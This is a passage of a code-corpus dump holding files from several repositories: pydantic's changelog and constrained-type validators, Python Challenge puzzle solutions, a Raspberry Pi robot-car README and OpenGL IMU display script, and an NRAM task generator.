"text": "coverage==4.5.1\nflake8==3.5.0\nisort==4.3.4\nmypy==0.560\npycodestyle==2.3.1\npyflakes==1.6.0\npytest==3.4.1\npytest-cov==2.5.1\npytest-isort==0.1.0\npytest-mock==1.7.1\npytest-sugar==0.9.1\n"
},
{
"alpha_fraction": 0.5692567825317383,
"alphanum_fraction": 0.6402027010917664,
"avg_line_length": 32.6363639831543,
"blob_id": "8736d867aeb8e21475d2d3f44af25853f9398591",
"content_id": "3ba9a8ca6bb41c861915db2121e46b10b2104084",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2960,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 88,
"path": "/HISTORY.rst",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": ".. :changelog:\n\nHistory\n-------\n\nv0.7.1 (2018-02-07)\n...................\n* fix bug with ``create_model`` modifying the base class\n\nv0.7.0 (2018-02-06)\n...................\n* added compatibility with abstract base classes (ABCs) #123\n* add ``create_model`` method #113 #125\n* **breaking change**: rename ``.config`` to ``.__config__`` on a model\n* **breaking change**: remove deprecated ``.values()`` on a model, use ``.dict()`` instead\n* remove use of ``OrderedDict`` and use simple dict #126\n* add ``Config.use_enum_values`` #127\n* add wildcard validators of the form ``@validate('*')`` #128\n\nv0.6.4 (2018-02-01)\n...................\n* allow python date and times objects #122\n\nv0.6.3 (2017-11-26)\n...................\n* fix direct install without ``README.rst`` present\n\nv0.6.2 (2017-11-13)\n...................\n* errors for invalid validator use\n* safer check for complex models in ``Settings``\n\nv0.6.1 (2017-11-08)\n...................\n* prevent duplicate validators, #101\n* add ``always`` kwarg to validators, #102\n\nv0.6.0 (2017-11-07)\n...................\n* assignment validation #94, thanks petroswork!\n* JSON in environment variables for complex types, #96\n* add ``validator`` decorators for complex validation, #97\n* depreciate ``values(...)`` and replace with ``.dict(...)``, #99\n\nv0.5.0 (2017-10-23)\n...................\n* add ``UUID`` validation #89\n* remove ``index`` and ``track`` from error object (json) if they're null #90\n* improve the error text when a list is provided rather than a dict #90\n* add benchmarks table to docs #91\n\nv0.4.0 (2017-07-08)\n...................\n* show length in string validation error\n* fix aliases in config during inheritance #55\n* simplify error display\n* use unicode ellipsis in ``truncate``\n* add ``parse_obj``, ``parse_raw`` and ``parse_file`` helper functions #58\n* switch annotation only fields to come first in fields list not last\n\nv0.3.0 (2017-06-21)\n...................\n* immutable models via ``config.allow_mutation = False``, associated cleanup and performance improvement #44\n* immutable helper methods ``construct()`` and ``copy()`` #53\n* allow pickling of models #53\n* ``setattr`` is removed as ``__setattr__`` is now intelligent #44\n* ``raise_exception`` removed, Models now always raise exceptions #44\n* instance method validators removed\n* django-restful-framework benchmarks added #47\n* fix inheritance bug #49\n* make str type stricter so list, dict etc are not coerced to strings. #52\n* add ``StrictStr`` which only always strings as input #52\n\nv0.2.1 (2017-06-07)\n...................\n* pypi and travis together messed up the deploy of ``v0.2`` this should fix it\n\nv0.2.0 (2017-06-07)\n...................\n* **breaking change**: ``values()`` on a model is now a method not a property,\n takes ``include`` and ``exclude`` arguments\n* allow annotation only fields to support mypy\n* add pretty ``to_string(pretty=True)`` method for models\n\nv0.1.0 (2017-06-03)\n...................\n* add docs\n* add history\n"
},
{
"alpha_fraction": 0.5844155550003052,
"alphanum_fraction": 0.7402597665786743,
"avg_line_length": 18.25,
"blob_id": "67b90d69f142a8d426f8a0e89a8dc93908845d1b",
"content_id": "8b0dc6a4991e449cfa55686036fdba6018e46b57",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 4,
"path": "/docs/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "docutils==0.14\nPygments==2.2.0\nSphinx==1.7.1\nsphinxcontrib-websupport==1.0.1\n"
},
{
"alpha_fraction": 0.6120067834854126,
"alphanum_fraction": 0.6134917140007019,
"avg_line_length": 23.94179916381836,
"blob_id": "af9d3a1786cc5861599b1c00dab5aea6e8b46cb2",
"content_id": "8918b7d65c5c4b67af87c7f6bae08683c3d995e2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4714,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 189,
"path": "/pydantic/types.py",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "import re\nfrom typing import Optional, Type, Union\n\nfrom .utils import import_string, make_dsn, validate_email\nfrom .validators import str_validator\n\n__all__ = [\n 'NoneStr',\n 'NoneBytes',\n 'StrBytes',\n 'NoneStrBytes',\n 'StrictStr',\n 'ConstrainedStr',\n 'constr',\n 'EmailStr',\n 'NameEmail',\n 'PyObject',\n 'DSN',\n 'ConstrainedInt',\n 'conint',\n 'PositiveInt',\n 'NegativeInt',\n]\n\nNoneStr = Optional[str]\nNoneBytes = Optional[bytes]\nStrBytes = Union[str, bytes]\nNoneStrBytes = Optional[StrBytes]\n\n\nclass StrictStr(str):\n @classmethod\n def get_validators(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not isinstance(v, str):\n raise ValueError(f'strict string: str expected not {type(v)}')\n return v\n\n\nclass ConstrainedStr(str):\n min_length: int = None\n max_length: int = None\n curtail_length: int = None\n regex = None\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value: str) -> str:\n if value is None:\n raise TypeError('None is not an allow value')\n\n v_len = len(value)\n if cls.min_length is not None and v_len < cls.min_length:\n raise ValueError(f'length less than minimum allowed: {cls.min_length}')\n\n if cls.curtail_length:\n if v_len > cls.curtail_length:\n value = value[:cls.curtail_length]\n elif cls.max_length is not None and v_len > cls.max_length:\n raise ValueError(f'length greater than maximum allowed: {cls.max_length}')\n\n if cls.regex:\n if not cls.regex.match(value):\n raise ValueError(f'string does not match regex \"{cls.regex.pattern}\"')\n return value\n\n\nclass EmailStr(str):\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n return validate_email(value)[1]\n\n\nclass NameEmail:\n __slots__ = 'name', 'email'\n\n def __init__(self, name, email):\n self.name = name\n self.email = email\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n return cls(*validate_email(value))\n\n def __str__(self):\n return f'{self.name} <{self.email}>'\n\n def __repr__(self):\n return f'<NameEmail(\"{self}\")>'\n\n\ndef constr(*, min_length=0, max_length=2**16, curtail_length=None, regex=None) -> Type[str]:\n # use kwargs then define conf in a dict to aid with IDE type hinting\n namespace = dict(\n min_length=min_length,\n max_length=max_length,\n curtail_length=curtail_length,\n regex=regex and re.compile(regex)\n )\n return type('ConstrainedStrValue', (ConstrainedStr,), namespace)\n\n\nclass PyObject:\n validate_always = True\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n try:\n return import_string(value)\n except ImportError as e:\n # errors must be TypeError or ValueError\n raise ValueError(str(e)) from e\n\n\nclass DSN(str):\n prefix = 'db_'\n fields = 'driver', 'user', 'password', 'host', 'port', 'name', 'query'\n validate_always = True\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value, values, **kwarg):\n if value:\n return value\n kwargs = {f: values.get(cls.prefix + f) for f in cls.fields}\n if kwargs['driver'] is None:\n raise ValueError(f'\"{cls.prefix}driver\" field may not be missing or None')\n return make_dsn(**kwargs)\n\n\nclass ConstrainedInt(int):\n gt: int = None\n lt: int = None\n\n @classmethod\n def 
get_validators(cls):\n yield int\n yield cls.validate\n\n @classmethod\n def validate(cls, value: int) -> int:\n if cls.gt is not None and value <= cls.gt:\n raise ValueError(f'size less than minimum allowed: {cls.gt}')\n elif cls.lt is not None and value >= cls.lt:\n raise ValueError(f'size greater than maximum allowed: {cls.lt}')\n return value\n\n\ndef conint(*, gt=None, lt=None) -> Type[int]:\n # use kwargs then define conf in a dict to aid with IDE type hinting\n namespace = dict(gt=gt, lt=lt)\n return type('ConstrainedIntValue', (ConstrainedInt,), namespace)\n\n\nclass PositiveInt(ConstrainedInt):\n gt = 0\n\n\nclass NegativeInt(ConstrainedInt):\n lt = 0\n\n\n# TODO, JsonEither, JsonList, JsonDict\n"
},
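A usage sketch for the constrained types above. constr and conint build subclasses on the fly, so their return values are used directly as annotations; the model below assumes the package's usual BaseModel entry point:

    from pydantic import BaseModel
    from pydantic.types import PositiveInt, constr

    class User(BaseModel):
        name: constr(max_length=10)
        age: PositiveInt

    user = User(name='Samuel', age=36)   # passes both validators
    # User(name='x' * 11, age=-1) would fail with 'length greater than
    # maximum allowed: 10' and 'size less than minimum allowed: 0'

The type('ConstrainedStrValue', ...) trick means each constr(...) call returns a fresh subclass whose class attributes carry the constraints, so the classmethod validators can read them without any per-instance state.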
{
"alpha_fraction": 0.7264957427978516,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18.5,
"blob_id": "c156785595169cf45d2911ab33a88ebf9d86a5db",
"content_id": "90e89d0383f85ced937188b3b4e1473d280d80a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "-r benchmarks/requirements.txt\n-r docs/requirements.txt\n-r tests/requirements.txt\n\nmsgpack-python==0.5.5\nujson==1.35\n"
}
] | 5 |
gsidhu/Python_Challenge_Solutions
|
https://github.com/gsidhu/Python_Challenge_Solutions
|
61e1a40c1f6bdc4e8b8f63139bd11905d091b74d
|
55d3b9e030c92a45a3fc5af84e6965656db915a2
|
eae0f1181df4dbe7cd80e8b728077ece54e0c3f2
|
refs/heads/master
| 2021-01-19T03:51:46.848197 | 2014-06-22T21:37:46 | 2014-06-22T21:37:46 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5376344323158264,
"alphanum_fraction": 0.6344085931777954,
"avg_line_length": 17.600000381469727,
"blob_id": "e464b662e99396578f2b8a7cd410b60779eb7269",
"content_id": "a552724f0b10507524abdca74bf21ef2bbe6e6c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 5,
"path": "/pex0.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex0():\n return (2**19)**2\n"
},
{
"alpha_fraction": 0.5448275804519653,
"alphanum_fraction": 0.568965494632721,
"avg_line_length": 19.714284896850586,
"blob_id": "02bde503f1caecb526611a20230ed0c6fccf4a5d",
"content_id": "0d81236f758eebc45aae9a1045426c49e6207f14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 28,
"path": "/pex4.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex4(x):\n '''\n for i in link:\n\tsth = pex4(link[-1])\n\tlink.append(sth)\n\tprint(link)\n\n Answer: peak.html \n '''\n import urllib.request as url\n import re\n link = []\n f = url.urlopen('http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing=' + x)\n text = f.read()\n f.close()\n pattern = re.compile(b'[0-9]+')\n pattern2 = re.compile('[0-9]+')\n num = re.findall(pattern, text)\n a = ''\n for i in num:\n a = str(i)\n link = re.findall(pattern2, a)\n\n return link[0]\n"
},
{
"alpha_fraction": 0.7390109896659851,
"alphanum_fraction": 0.7390109896659851,
"avg_line_length": 59.5,
"blob_id": "49488170e80f86b13c0e0fc9c6982c34e1a5006d",
"content_id": "7a0e4f45dbf034122b55253b02520d4946be06b1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 364,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 6,
"path": "/README.md",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "##The Python Challenge - Solutions\n===================\n\n[The Python Challenge](www.pythonchallenge.com) has a brilliant set of mind-bending exercises. Here I'll post the solutions to some of the exercises that I have been able to crack through. \n\nI would **strongly** suggest you try to solve the exercises on your own and not rely on easily-available solutions. \n"
},
{
"alpha_fraction": 0.5340599417686462,
"alphanum_fraction": 0.5517711043357849,
"avg_line_length": 23.433332443237305,
"blob_id": "e16845f6612c21fb8228aa1d443575939f600397",
"content_id": "0970191754532c31cfcf2650cafc1f903214fc11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 30,
"path": "/pex6.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex6():\n '''\n Change URL to channel.zip and readme.txt\n Apparently textfiles inside zipfiles have comments you can extract\n\n answer: hockey -> oxygen\n '''\n\n import string\n import zipfile\n bob = []\n f = zipfile.ZipFile('channel.zip')\n filename = \"90052.txt\"\n while True:\n file = open(filename)\n txt = file.read()\n filename = txt[16:] + '.txt'\n if filename[0] not in string.digits:\n break\n bob.append(f.getinfo(filename).comment)\n chop = []\n for i in bob:\n chop.append(str(i).strip(\"b'\"))\n for j in chop:\n if j == '\\\\n':\n print('')\n print(j, end = '')\n\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.559440553188324,
"avg_line_length": 22.83333396911621,
"blob_id": "5289b3ba0ada56f1df620e7ab0c6efd8a527d602",
"content_id": "27b27634b5aeef3e578b3f1a88679294abc80d6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 12,
"path": "/pex3.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex3():\n '''\n Answer: linkedlist\n '''\n import re\n file = open('pex3.txt')\n text = file.read()\n pattern = re.compile('[a-z][A-Z][A-Z][A-Z][a-z][A-Z][A-Z][A-Z][a-z]')\n return re.findall(pattern, text)\n"
},
{
"alpha_fraction": 0.5365344285964966,
"alphanum_fraction": 0.5490605235099792,
"avg_line_length": 21.809524536132812,
"blob_id": "30b7dcc684d3b9b06041e2c12f8dd38b20c8f11c",
"content_id": "c3b4275a90065ddf88a077b82f3ff6a8d2e51626",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 21,
"path": "/pex1.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex1():\n '''\n Answer: ocr\n '''\n import string\n alpha = list(string.ascii_lowercase)\n alpha.extend(['a', 'b'])\n cin = input(\"String: \")\n cin_alpha = list(cin)\n answer = []\n for i in cin:\n if i in string.ascii_lowercase:\n alpha_index = alpha.index(i)\n answer.append(alpha[alpha_index+2])\n else:\n answer.append(i)\n return ''.join(answer)\n"
},
{
"alpha_fraction": 0.5257142782211304,
"alphanum_fraction": 0.5428571701049805,
"avg_line_length": 17.421052932739258,
"blob_id": "64793711f023bdeb66bae3f78d240863b8e3e385",
"content_id": "3a83b000179e429c6845c8e1ee68ad59bad3f806",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 19,
"path": "/pex2.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex2():\n '''\n Answer: equality\n '''\n import string\n file = open('pex2.txt')\n line = file.read()\n key = list(line)\n alpha = list(string.ascii_letters)\n ans = []\n for i in key:\n if i in alpha:\n ans.append(i)\n file.close()\n return ans\n"
},
{
"alpha_fraction": 0.4529540538787842,
"alphanum_fraction": 0.4770240783691406,
"avg_line_length": 25.882352828979492,
"blob_id": "2719b96ef4860ddfd5dcd4de0160f97ee6e41b75",
"content_id": "90d44d0aeb880ae4a15e14515e75e574aefbf33f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 17,
"path": "/pex5.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex5():\n import pickle\n '''\n Unpickle the banner.p file in the source code and then \"print the banner\"\n\n Answer: channel\n '''\n f = open('banner.p', 'rb')\n stuff = pickle.load(f)\n for i in a:\n for j in range(0, len(i)):\n if j == len(i)-1:\n print(i[j][0]*i[j][1])\n print(i[j][0]*i[j][1], end='')\n"
}
] | 8 |
celibertojr/RobotCar4WBCAM
|
https://github.com/celibertojr/RobotCar4WBCAM
|
5955a0cdb8030284a0f995f727ea10fada641606
|
4ad6d1a0f68de8e77c3618a20be400025ccb7620
|
3fa31586a3c4452a98d8cf58ccda34f09ef1ba93
|
refs/heads/master
| 2023-03-04T11:33:31.943924 | 2023-02-14T21:27:19 | 2023-02-14T21:27:19 | 78,648,745 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.46875494718551636,
"alphanum_fraction": 0.5320360660552979,
"avg_line_length": 26.723684310913086,
"blob_id": "ec50935c1a4275cc9ffcc290e60de9a59d090f0a",
"content_id": "d6786ddbb9f3318732ceab5831517992e1a4f529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6321,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 228,
"path": "/fonte/display.py",
"repo_name": "celibertojr/RobotCar4WBCAM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport smbus\nimport pygame\nimport urllib\nimport time\nimport math\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom math import radians\nfrom pygame.locals import *\n\n# Power management registers\npower_mgmt_1 = 0x6b\npower_mgmt_2 = 0x6c\n\nSCREEN_SIZE = (800, 600)\nSCALAR = .5\nSCALAR2 = 0.2\n\ndef read_byte(adr):\n return bus.read_byte_data(address, adr)\n\ndef read_word(adr):\n high = bus.read_byte_data(address, adr)\n low = bus.read_byte_data(address, adr+1)\n val = (high << 8) + low\n return val\n\ndef read_word_2c(adr):\n val = read_word(adr)\n if (val >= 0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\ndef dist(a,b):\n return math.sqrt((a*a)+(b*b))\n\ndef get_y_rotation(x,y,z):\n radians = math.atan2(x, dist(y,z))\n return -math.degrees(radians)\n\ndef get_x_rotation(x,y,z):\n radians = math.atan2(y, dist(x,z))\n return math.degrees(radians)\n\ndef get_z_rotation(x,y,z):\n radians = math.atan2(y,z)\n #radians = math.atan((math.sqrt(x*x+y*y)/z))\n return math.degrees(radians)\n\nbus = smbus.SMBus(1) # or bus = smbus.SMBus(1) for Revision 2 boards\naddress = 0x68 # This is the address value read via the i2cdetect command\n\n# Now wake the 6050 up as it starts in sleep mode\nbus.write_byte_data(address, power_mgmt_1, 0)\n\ndef get_current_perf(axis):\n\taccel_xout = read_word_2c(0x3b)\n\taccel_yout = read_word_2c(0x3d)\n\taccel_zout = read_word_2c(0x3f)\n\taccel_xout_scaled = accel_xout / 16384.0\n\taccel_yout_scaled = accel_yout / 16384.0\n\taccel_zout_scaled = accel_zout / 16384.0\n\n\tif axis == \"x\":\n\t\tvalue = round(get_x_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"x rotation: \" , value\n\t\treturn value\n\telif axis == \"y\":\n\t\tvalue = round(get_y_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"y rotation: \" , value\n\t\treturn value\n\telif axis == \"z\":\n\t\tvalue = round(get_z_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"z rotation: \" , value\n\t\treturn value\n\telse: \n\t\treturn False\n\ndef resize(width, height):\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width) / height, 0.001, 10.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n \ndef init():\n glEnable(GL_DEPTH_TEST)\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_BLEND)\n glEnable(GL_POLYGON_SMOOTH)\n glHint(GL_POLYGON_SMOOTH_HINT, GL_NICEST)\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 1.0));\n\n# def read_values():\n# #link = \"http://192.168.1.65:8080\" # Change this address to your settings\n# #f = urllib.urlopen(link)\n# myfile = \"45 45\"\n# return myfile.split(\" \")\n\ndef run():\n pygame.init()\n screen = pygame.display.set_mode(SCREEN_SIZE, HWSURFACE | OPENGL | DOUBLEBUF)\n resize(*SCREEN_SIZE)\n init()\n clock = pygame.time.Clock()\n cube = Cube((0.0, 0.0, 0.0), (.5, .5, .7))\n glTranslatef(0.0,0.0, -5)\n while True:\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYUP and event.key == K_ESCAPE:\n return\n\n y_angle = get_current_perf('y')\n #z_angle = get_current_perf('z')\n x_angle = get_current_perf('x')\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glColor((1.,1.,1.))\n glLineWidth(1)\n glBegin(GL_LINES)\n\n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1,-1)\n 
glVertex3f(x/10.,-1,1)\n \n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1, -1)\n glVertex3f(x/10., 1, -1)\n \n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f( 2, -1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f(-2, 1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f( 2, -1, z/10.)\n glVertex3f( 2, 1, z/10.)\n\n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f( 2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., 1)\n glVertex3f(-2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(2, y/10., 1)\n glVertex3f(2, y/10., -1)\n \n glEnd()\n glPushMatrix()\n glRotate(float(y_angle), 1, 0, 0)\n glRotate(float(x_angle), 0, 0, 1)\n #glRotate(float(z_angle), 0, 1, 0)\n cube.render()\n glPopMatrix()\n pygame.display.flip()\n time.sleep(0.1)\n\nclass Cube(object):\n\n def __init__(self, position, color):\n self.position = position\n self.color = color\n\n # Cube information\n num_faces = 6\n\n vertices = [ (-1.0, -0.05, 0.5),\n (1.0, -0.05, 0.5),\n (1.0, 0.05, 0.5),\n (-1.0, 0.05, 0.5),\n (-1.0, -0.05, -0.5),\n (1.0, -0.05, -0.5),\n (1.0, 0.05, -0.5),\n (-1.0, 0.05, -0.5) ]\n\n normals = [ (0.0, 0.0, +1.0), # front\n (0.0, 0.0, -1.0), # back\n (+1.0, 0.0, 0.0), # right\n (-1.0, 0.0, 0.0), # left\n (0.0, +1.0, 0.0), # top\n (0.0, -1.0, 0.0) ] # bottom\n\n vertex_indices = [ (0, 1, 2, 3), # front\n (4, 5, 6, 7), # back\n (1, 5, 6, 2), # right\n (0, 4, 7, 3), # left\n (3, 2, 6, 7), # top\n (0, 1, 5, 4) ] # bottom\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n vertices = self.vertices\n\n # Draw all 6 faces of the cube\n glBegin(GL_QUADS)\n\n for face_no in xrange(self.num_faces):\n glNormal3dv(self.normals[face_no])\n v1, v2, v3, v4 = self.vertex_indices[face_no]\n glVertex(vertices[v1])\n glVertex(vertices[v2])\n glVertex(vertices[v3])\n glVertex(vertices[v4])\n glEnd()\n\nif __name__ == \"__main__\":\n run()\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.6339144110679626,
"alphanum_fraction": 0.6798732280731201,
"avg_line_length": 14.390243530273438,
"blob_id": "a71280f77446ab6f28668c5cdadc16a660872bd0",
"content_id": "f9bf2a86d896b74d841ef26811eeb960c0de714b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/README.md",
"repo_name": "celibertojr/RobotCar4WBCAM",
"src_encoding": "UTF-8",
"text": "# RobotCar4WB-CAM\n\n#The Robot car 4W\n\n## Original idea\n\nThe original idea comes from https://github.com/phfbertoleti/RoboPi.\n\n\n## Diagram (original project)\n\n\n\n\n\n## Motor Drive Circuit\n\n* GPIO18\tpin 12\tLeft motor\n* GPIO23\tpin 16\tRight motor\n* GND\t pin 06 \n\n# Sensors and parts\n\n* 1 - Raspberry PI 3\n* 2 - Speedy Sensor Encoder\n* 1 - IMU MPU-9250\n* 1 - cheap camera\n* 1 - GPS (soon)\n* 2 - Rechargeable Power Bank 2200 + battery pack\n\n\n## The Robot\n\n\n\n\n\n\n\n\n# This project is ongoing I will try to update it every month but not promise! :-)\n"
}
] | 2 |
DrugoLebowski/denn-lite-nram-executor
|
https://github.com/DrugoLebowski/denn-lite-nram-executor
|
88d3c90ba8ac464e8dda0dcc9adda375d3cd0bfd
|
3abb49b3f28cc1457f246b158167f664eaf37a8e
|
844645960ab1617046012749da1c023eaa131286
|
refs/heads/master
| 2021-05-06T19:48:24.628617 | 2018-03-29T23:10:33 | 2018-03-29T23:10:33 | 112,182,172 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48343372344970703,
"alphanum_fraction": 0.5075300931930542,
"avg_line_length": 26.70833396911621,
"blob_id": "bf18cc143d0e0611362ad38962721cd5f87ad0ae",
"content_id": "1e63d21fe3ab89b87783c20f4abf2e87f479af89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 664,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 24,
"path": "/gates/LessEqualThan.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import zeros_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass LessEqualThan(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n def create_matrix(M, idx):\n new_matrix = zeros_like(M)\n new_matrix[0, idx:] = M[0, idx:] # [[x, x, x], [0, x, x], [0, 0, x]]\n return new_matrix\n\n Z = zeros_like(A)\n B_prime = [create_matrix(B, idx) for idx in range(B.shape[1])]\n B = np.stack(B_prime, axis=1)\n A = A[..., None]\n Z[0, 1] = (A[0] * B[0]).sum()\n Z[0, 0] = (1 - Z[0, 1])\n\n return M, Z"
},
{
"alpha_fraction": 0.5891163349151611,
"alphanum_fraction": 0.6075885891914368,
"avg_line_length": 44.522727966308594,
"blob_id": "7affe429bbfd9f801b293d542bb32f455f0eae15",
"content_id": "2a14420b9faebf521ae9d2b9ec40e7e89b5f431b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2007,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 44,
"path": "/tasks/TaskSum.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskSum(Task):\n \"\"\" [Sum]\n Given pointers to 2 arrays A and B, and the pointer to the output o,\n sum the two arrays into one array. The input is given as:\n a, b, o, A[0], .., A[n − 1], G, B[0], ..., B[m − 1], G,\n where G is a special guardian value, a and b point to\n the first elements of arrays A and B respectively, and o\n points to the address after the second G.\n The A + B array should be written starting from position o.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n offset = 3\n remaining_size = self.max_int - 6\n arrays_memory_size = int(remaining_size / 3)\n if not remaining_size % 3 == 0:\n raise Exception(\"%s: Memory space is not sufficient!\" % TaskSum.__class__.__name__)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_b = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_a_plus_b = np.mod(list_elements_a + list_elements_b, self.max_int)\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + arrays_memory_size + 1\n init_mem[:, 2] = offset + (2 * arrays_memory_size) + 2\n init_mem[:, offset:(offset + arrays_memory_size)] = 